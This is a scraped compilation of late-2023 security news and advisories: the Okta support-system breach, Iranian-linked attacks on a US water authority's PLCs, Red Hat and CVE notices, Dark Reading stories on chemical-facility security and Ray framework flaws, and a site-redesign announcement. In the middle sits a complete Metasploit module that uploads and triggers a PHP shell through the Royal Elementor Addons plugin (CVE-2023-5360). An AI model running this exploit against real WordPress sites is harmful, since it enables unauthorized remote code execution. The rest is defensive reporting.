Okta upped its original estimate of customer support users affected by a recent breach from 1 percent to 100 percent, citing a “discrepancy.”

In late October, the identity management platform Okta began notifying its users of a breach of its customer support system. The company said at the time that about 1 percent of its 18,400 customers were impacted by the incident. But in a massive expansion of this estimate early this morning, Okta said that its investigation has uncovered additional evidence that, in fact, _all_ of its customers had data stolen in the breach two months ago.

The original 1 percent estimate related to activity in which attackers used stolen login credentials to take over an Okta support account that had some customer system access for troubleshooting. But the company admitted on Wednesday that its initial investigation had missed other malicious activity in which the attacker simply ran an automated query of the database that contains names and email addresses of “all Okta customer support system users.” This also included some Okta employee information.

While the attackers queried for more data than just names and email addresses—including company names, contact phone numbers, and the data of last login and last password changes—Okta says that “the majority of the fields in the report are blank and the report does not include user credentials or sensitive personal data. For 99.6 percent of users in the report, the only contact information recorded is full name and email address.”

The only Okta users not impacted by the breach are high-sensitivity customers that must comply with the United States Federal Risk and Authorization Management Program or US Department of Defense Impact Level 4 restrictions. Okta provides a separate support platform for these customers.

Okta says it didn’t realize that all customers had been affected by the incident because, while its initial investigation had looked at the queries the attackers ran on the system, “the file size of one particular report downloaded by the threat actor was larger than the file generated during our initial investigation.” In the initial assessment, when Okta regenerated the report in question as part of retracing the attackers’ steps, it didn’t run an “unfiltered” report, which would have returned more results. This meant that in Okta’s initial analysis, there was a discrepancy between the size of the file the investigators downloaded and the size of the file the attackers had downloaded, as recorded in the company’s logs.

Okta did not immediately respond to WIRED’s requests for clarification on why it took a month for the company to run an unfiltered report and reconcile this inconsistency.

Jake Williams, a faculty member at the Institute for Applied Network Security who specializes in corporate security incident response, says that it’s not unusual for companies to take extra time to investigate anomalies flagged in initial security investigations. He says that this partly stems from the challenge of comprehensively assessing all evidence, but that it can also be a tactic to avoid disclosing anything that isn’t absolutely necessary under regulatory requirements.

In the case of Okta, though, the company is already under scrutiny because of the stakes inherent in its work as an identity management service, as well as the fact that the company has suffered past breaches and communicated poorly about their true impact.

“I think this one is so high-profile, and the discrepancy so easily identifiable, that they risked SEC issues by not disclosing it sooner,” Williams says. “With Okta, you wait for the other shoe to drop, but then it’s like they also have a third and fourth shoe somehow.”

As companies often do, Okta says it does not have “direct knowledge or evidence that this information is being actively exploited.” But the company emphasized on Wednesday that it is very possible the stolen data will be used to fuel phishing attacks, and recommended repeatedly that all its customers and their administrators turn on multi-factor authentication for their accounts if they haven’t already.

Okta Breach Impacted All Customer Support Users—Not 1 Percent

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed that it's responding to a cyber attack that involved the active exploitation of Unitronics programmable logic controllers (PLCs) to target the Municipal Water Authority of Aliquippa in western Pennsylvania.
The attack has been attributed to an Iranian-backed hacktivist collective known as Cyber Av3ngers.
"Cyber threat

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed that it's responding to a cyber attack that involved the active exploitation of Unitronics programmable logic controllers (PLCs) to target the Municipal Water Authority of Aliquippa in western Pennsylvania.

The attack has been attributed to an Iranian-backed hacktivist collective known as Cyber Av3ngers.

"Cyber threat actors are targeting PLCs associated with \[Water and Wastewater Systems\] facilities, including an identified Unitronics PLC, at a U.S. water facility," the agency said.

"In response, the affected municipality's water authority immediately took the system offline and switched to manual operations—there is no known risk to the municipality's drinking water or water supply."

According to news reports quoted by the Water Information Sharing & Analysis Center (WaterISAC), CyberAv3ngers is alleged to have seized control of the booster station that monitors and regulates pressure for Raccoon and Potter Townships.

With PLCs being used in the WWS sector to monitor various stages and processes of water and wastewater treatment, disruptive attacks attempting to compromise the integrity of such critical processes can have adverse impacts, preventing WWS facilities from providing access to clean, potable water.

To mitigate such attacks, CISA is recommending that organizations change the Unitronics PLC default password, enforce multi-factor authentication (MFA), disconnect the PLC from the internet, back up the logic and configurations on any Unitronics PLCs to enable fast recovery, and apply latest updates.

Cyber Av3ngers has a history of targeting the critical infrastructure sector, claiming to have infiltrated as many as 10 water treatment stations in Israel. Last month, the group also claimed responsibility for a major cyber assault on Orpak Systems, a prominent provider of gas station solutions in the country.

"Every Equipment 'Made In Israel' Is Cyber Av3ngers Legal Target," the group claimed in a message posted on its Telegram channel on November 26, 2023.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Iranian Hackers Exploit PLCs in Attack on Water Authority in U.S.

WordPress Royal Elementor Addons and Templates plugin versions prior to 1.3.79 suffer from a remote shell upload vulnerability.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Wordpress  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'WordPress Royal Elementor Addons RCE',        'Description' => %q{          Exploit for the unauthenticated file upload vulnerability in WordPress Royal Elementor Addons and Templates plugin (< 1.3.79).        },        'Author' => [          'Fioravante Souza', # Vulnerability discovery          'Valentin Lobstein' # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2023-5360'],          ['URL', 'https://vulners.com/nuclei/NUCLEI:CVE-2023-5360'],          ['WPVDB', '281518ff-7816-4007-b712-63aed7828b34']        ],        'Platform' => ['unix', 'linux', 'win', 'php'],        'Arch' => [ARCH_PHP, ARCH_CMD],        'Targets' => [['Automatic', {}]],        'DisclosureDate' => '2023-11-23',        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 443        },        'Privileged' => false,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )  )  end  def check    return CheckCode::Unknown unless wordpress_and_online?    wp_version = wordpress_version    print_status("WordPress Version: #{wp_version}") if wp_version    check_code = check_plugin_version_from_readme('royal-elementor-addons', '1.3.79')    if check_code.code != 'appears'      return CheckCode::Safe    end    plugin_version = check_code.details[:version]    print_good("Detected Royal Elementor Addons version: #{plugin_version}")    return CheckCode::Appears  end  def exploit    print_status('Attempting to retrieve nonce...')    nonce = retrieve_nonce    print_status('Sending payload')    uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')    data = {      'action' => 'wpr_addons_upload_file',      'max_file_size' => rand(10001),      'allowed_file_types' => 'ph$p',      'triggering_event' => 'click',      'wpr_addons_nonce' => nonce    }    file_content = '<?php '    file_content << (payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));")    file_content << '?>'    file_name = "#{Rex::Text.rand_text_alphanumeric(8)}.ph$p"    post_data = Rex::MIME::Message.new    post_data.add_part(file_content, 'application/octet-stream', nil, "form-data; name=\"uploaded_file\"; filename=\"#{file_name}\"")    data.each_pair do |key, value|      post_data.add_part(value.to_s, nil, nil, "form-data; name=\"#{key}\"")    end    res = send_request_cgi({      'uri' => uri,      'method' => 'POST',      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",      'data' => post_data.to_s    })    unless res      fail_with(Failure::Unreachable, 'No response received from the target')    end    if res.code == 200 && res.body.include?('success')      print_good('Payload uploaded successfully')      response_data = JSON.parse(res.body)      if response_data.key?('data') && response_data['data'].key?('url')        file_url = response_data['data']['url']        print_status('Triggering the payload')        send_request_cgi({          'uri' => file_url,          'method' => 'GET'        })      else        fail_with(Failure::UnexpectedReply, 'Payload uploaded but no URL returned in the response')      end    else      fail_with(Failure::UnexpectedReply, 'Failed to upload the payload')    end  end  def retrieve_nonce    res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'method' => 'GET')    fail_with(Failure::Unreachable, 'No response received from the target') if res.nil?    fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code from the target: #{res.code}") if res.code != 200    match = res.body.match(/var\s+WprConfig\s*=\s*({.+?});/)    fail_with(Failure::NoTarget, 'Nonce not found in the response. Is Royal Elementor Addons activated AND being used by the WordPress site being targeted?') if match.nil? || match[1].nil?    nonce = JSON.parse(match[1])['nonce']    fail_with(Failure::NoTarget, 'Parsed a response, but the nonce value is missing') if nonce.nil?    print_good("Nonce found in response: #{nonce.inspect}")    nonce  endend

WordPress Royal Elementor Addons And Templates Remote Shell Upload

Red Hat Security Advisory 2023-7540-01 - An update for curl is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7540.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Low: curl security and bug fix updateAdvisory ID:        RHSA-2023:7540-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7540Issue date:         2023-11-28Revision:           01CVE Names:          CVE-2023-38546====================================================================Summary: An update for curl is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP.Security Fix(es):* curl: cookie injection with none file (CVE-2023-38546)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Bug Fix(es):* libssh (curl sftp) not trying password auth (BZ#2240032)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-38546References:https://access.redhat.com/security/updates/classification/#lowhttps://bugzilla.redhat.com/show_bug.cgi?id=2240032https://bugzilla.redhat.com/show_bug.cgi?id=2241938

Red Hat Security Advisory 2023-7540-01

A serialization vulnerability in logback receiver component part of 
logback version 1.4.11 allows an attacker to mount a Denial-Of-Service 
attack by sending poisoned data.



CVE-2023-6378: News


A server-side request forgery vulnerability in ESM prior to version 11.6.8 allows a low privileged authenticated user to upload arbitrary content, potentially altering configuration. This is possible through the certificate validation functionality where the API accepts uploaded content and doesn't parse for invalid data



CVE-2023-6070

Identity services provider Okta has disclosed that it detected "additional threat actor activity" in connection with the October 2023 breach of its support case management system.
"The threat actor downloaded the names and email addresses of all Okta customer support system users," the company said in a statement shared with The Hacker News.
"All Okta Workforce Identity Cloud (WIC) and Customer

Cyber Attack / Data Breach

Identity services provider **Okta** has disclosed that it detected "additional threat actor activity" in connection with the October 2023 breach of its support case management system.

"The threat actor downloaded the names and email addresses of all Okta customer support system users," the company said in a statement shared with The Hacker News.

"All Okta Workforce Identity Cloud (WIC) and Customer Identity Solution (CIS) customers are impacted except customers in our FedRamp High and DoD IL4 environments (these environments use a separate support system NOT accessed by the threat actor). The Auth0/CIC support case management system was not impacted by this incident."

News of the expanded scope of the breach was first reported by Bloomberg.

The company also told the publication that while it does not have any evidence of the stolen information being actively misused, it has taken the step of notifying all customers of potential phishing and social engineering risks.

It also stated that it "pushed new security features to our platforms and provided customers with specific recommendations to defend against potential targeted attacks against their Okta administrators."

Okta, which has enlisted the help of a digital forensics firm to support its investigation, further said it "will also notify individuals that have had their information downloaded."

The development comes more than three weeks after the identity and authentication management provider said the breach, which took place between September 28 to October 17, 2023, affected 1% – i.e., 134 – of its 18,400 customers.

The identity of the threat actors behind the attack against Okta's systems is currently not known, although a notorious cybercrime group called Scattered Spider has targeted the company as recently as August 2023 to obtain elevated administrator permissions by pulling off sophisticated social engineering attacks.

According to a report published by ReliaQuest last week, Scattered Spider infiltrated an unnamed company and gained access to an IT administrator's account via Okta single sign-on (SSO), followed by laterally moving from the identity-as-a-service (IDaaS) provider to their on-premises assets in less than one hour.

The formidable and nimble adversary, in recent months, has also evolved into an affiliate for the BlackCat ransomware operation, infiltrating cloud and on-premises environments to deploy file-encrypting malware for generating illicit profits.

"The group's ongoing activity is a testament to the capabilities of a highly skilled threat actor or group having an intricate understanding of cloud and on-premises environments, enabling them to navigate with sophistication," ReliaQuest researcher James Xiang said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Okta Discloses Broader Impact Linked to October 2023 Support System Breach

Dropping the ball on chemical security has precipitated "a national security gap too great to ignore," CISA warns.

Source: TTstudio via Alamy Stock Photo

CISA warned this week that facilities maintaining dangerous chemicals across the US are no longer receiving adequate security support.

Compared with such industries as energy, water, and telecoms, cybersecurity professionals tend to be less au courant with the chemicals sector, despite the physical and cybersecurity threats it faces.

CISA used to plug that gap with its Chemical Facility Anti-Terrorism Standards (CFATS). In CISA's own words, CFATS "identifies and regulates high-risk facilities to ensure security measures are in place to reduce the risk that certain dangerous chemicals are weaponized by terrorists." But on July 28, Congress allowed the statutory authority of the CFATS program to expire.

Yesterday, in a blog marking the fourth monthiversary of that decision, CISA associate director for chemical security Kelly Murray warned that "the absence of the CFATS program is a national security gap too great to ignore," likely leading to security gaps, unsafe conditions, and possibly even access by a terrorist.

**Terrorist Threats to the Chemicals Industry**

There are four primary pillars to CFATS, each with an important security function.

Firstly, CISA has screened over 40,000 chemical facilities through the program, identifying 3,200 of them as high-risk. With four months of downtime, the agency estimates that at least 200 new facilities have likely acquired dangerous chemicals, and that "facilities could be stockpiling these chemicals in excess of their existing security precautions, increasing the risk of terrorist exploitation."

Equally, through CFATS, CISA worked with facilities to identify risks to them and their surroundings, and develop cyber and physical safety plans to mitigate those risks, improving their security postures by around 60%. As Murray explained, approximately one third of CISA's site visits historically tended to reveal security gaps, thus "we can safely estimate that hundreds of security gaps have gone unidentified since July."

Perhaps most importantly, chemical facilities used CFATS to run personnel against a Terrorist Screening Database. CISA used to vet an average of 9,000 names per month, flagging in all more than 10 individuals with terrorist ties. At these rates, Murray estimated, its missed screenings "likely would have identified an individual with or seeking access to dangerous chemicals as a known or suspected terrorist at some point over the past four months."

Lastly, CFATS was designed to help the chemical industry stay ahead of the evolving threat landscape, both from a physical and cyber standpoint. "Prior to the lapse in authority, this process was going to be further enhanced by a proposed rulemaking effort to enhance the physical and cybersecurity standards required of CFATS," Murray explained, though now no longer.

Murray ended the letter with a call to Congress to reinstate CFATS. "This is a resolution we cannot afford to break," she concluded.

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

CISA to Congress: US Under Threat of Chemical Attacks

Anyscale has dismissed the vulnerabilities as non-issues, according to researchers who reported the bugs to the company.

Source: Ken stocker via Shutterstock

Organizations using Ray, the open source framework for scaling artificial intelligence and machine learning workloads, are exposed to attacks via a trio of as yet unpatched vulnerabilities in the technology, researchers said this week.

**Potentially Heavy Damage**

The vulnerabilities give attackers a way to, among other things, gain operating system access to all nodes in a Ray cluster, enable remote code execution, and escalate privileges. The flaws present a threat to organizations that expose their Ray instances to the Internet or even a local network.

Researchers from Bishop Fox discovered the vulnerabilities and reported them to Anyscale — which sells a fully managed version of the technology — in August. Researchers from security vendor Protect AI also privately reported two of the same vulnerabilities to Anyscale previously.

But so far, Anyscale has not addressed the flaws, says Berenice Flores Garcia, senior security consultant at Bishop Fox. "Their position is that the vulnerabilities are irrelevant because Ray is not intended for use outside of a strictly controlled network environment and claims to have this stated in their documentation," Garcia says.

Anyscale did not immediately respond to a Dark Reading request for comment.

Ray is a technology that organizations can use to distribute the execution of complex, infrastructure-intensive AI and machine learning workloads. Many large organizations (including OpenAI, Spotify, Uber, Netflix, and Instacart) currently use the technology for building scalable new AI and machine learning applications. Amazon's AWS has integrated Ray into many of its cloud services and has positioned it as technology that organizations can use to accelerate the scaling of AI and ML apps.

**Easy to Find and Exploit**

The vulnerabilities that Bishop Fox reported to Anyscale pertain to improper authentication and input validation in Ray Dashboard, Ray Client, and potentially other components. The vulnerabilities affect Ray versions 2.6.3 and 2.8.0 and allow attackers a way to obtain any data, scripts, or files stored in a Ray cluster. "If the Ray framework is installed in the cloud (i.e., AWS), it is possible to retrieve highly privileged IAM credentials that allow privilege escalation," Bishop Fox said in its report.

The three vulnerabilities that Bishop Fox reported to Anyscale are CVE-2023-48023, a remote code execution (RCE) vulnerability tied to missing authentication for a critical function; CVE-2023-48022, a server-side request forgery vulnerability in the Ray Dashboard API that enables RCE; and CVE-2023-6021, an insecure input validation error that also enables a remote attacker to execute malicious code on an affected system.

Bishop Fox's report on the three vulnerabilities included details on how an attacker could potentially exploit the flaws to execute arbitrary code.

The vulnerabilities are easy to exploit, and attackers do not require a high level of technical skills to take advantage of them, Garcia says. "An attacker only requires remote access to the vulnerable component ports — ports 8265 and 10001 by default — from the Internet or from a local network," and some basic Python knowledge, she says.

"The vulnerable components are very easy to find if the Ray Dashboard UI is exposed. This is the gate to exploit the three vulnerabilities included in the advisory," she adds. According to Garcia, if the Ray Dashboard is not detected, a more specific fingerprint of the service ports would be required to identify the vulnerable ports. "Once the vulnerable components are identified, they are very easy to exploit following the steps from the advisory," Garcia says.

Bishop Fox's advisory shows how an attacker could exploit the vulnerabilities to obtain a private key and highly privileged credentials from an AWS cloud account where Ray is installed. But the flaws affect all organizations that expose the software to the Internet or local network.

**Controlled Network Environment**

Though Anycase did not respond to Dark Reading, the company's documentation states the need for organizations to deploy Ray clusters in a controlled network environment. "Ray expects to run in a safe network environment and to act upon trusted code," the documentation states. It mentions the need for organizations to ensure that network traffic between Ray components happens in an isolated environment and to have strict network controls and authentication mechanisms when accessing additional services.

"Ray faithfully executes code that is passed to it — Ray doesn’t differentiate between a tuning experiment, a rootkit install, or an S3 bucket inspection," the company noted. "Ray developers are responsible for building their applications with this understanding in mind."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Critical Vulns Found in Ray Open Source Framework for AI/ML Workloads

Check out our new look — it's crisp, fast, and more reader-friendly.

Source: ronstik via Alamy Stock Photo

Here are some adjectives the Dark Reading team used to describe our revamped site that went live today: Elegant. Slick. Seamless. Clean. Modern.

Change is never easy or comfortable. But the process almost always winds up injecting new life and fresh purpose into your mission, and that's what we've accomplished with Dark Reading's latest look.

The journey to our new look began in August with the quiet rollout of an updated Dark Reading logo that gave our beloved brand a more contemporary design.

Today we've wrapped that logo in a new website platform that improves the overall reader experience, and our hope is that it makes your visit to the site more pleasant, efficient, and productive.

We've streamlined and updated our section names so the site is easier to navigate by topics (check out the Cybersecurity Topics button at the top of the black navigation bar). There's also more context about the type of content that's here, and how to find it on the Dark Reading site.

We enhanced our featured news section at the top of the fold and added a special feed of the latest news from around the globe via Dark Reading Global. As we announced this spring, DR Global initially is focused on the rapidly growing cybersecurity industry in the Middle East and Africa, but stay tuned as we expand our scope to other regions as well.

Scroll further down the homepage and you'll see our Latest News and Commentary sections, packed with our traditional mix of informed, unique, and relevant content. You'll also see a new space titled Deep Reading, which showcases Dark Reading's vast library of digital reports and original research. You can read summaries of our reports as well as download them for free.

Underneath our dedicated features section The Edge, and DR Technology, our section dedicated to cybersecurity technology trends and products, you will find our newest section, DR Global, now with a homepage presence and its own special section within the site.

That's just a quick tour of some of the new features and functions on the updated Dark Reading site. There will be more landing on the site in the coming months as we evolve to match our readers' needs. No matter how much our look changes, we are committed to serving up comprehensive and informed reporting, analysis, and other content that long has set Dark Reading apart as one of the top cybersecurity media sites in the industry.

In the meantime, we want to hear from you on what you think about the site redesign and its features. Drop us an email at \[email protected\] with your feedback — good or bad, we can take it.

**About the Author(s)**

Editor-in-Chief, Dark Reading

Kelly Jackson Higgins is the Editor-in-Chief of Dark Reading. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise Magazine, Virginia Business magazine, and other major media properties. Jackson Higgins was recently selected as one of the Top 10 Cybersecurity Journalists in the US, and named as one of Folio's 2019 Top Women in Media. She began her career as a sports writer in the Washington, DC metropolitan area, and earned her BA at William & Mary. Follow her on Twitter @kjhiggins.

Tag

#auth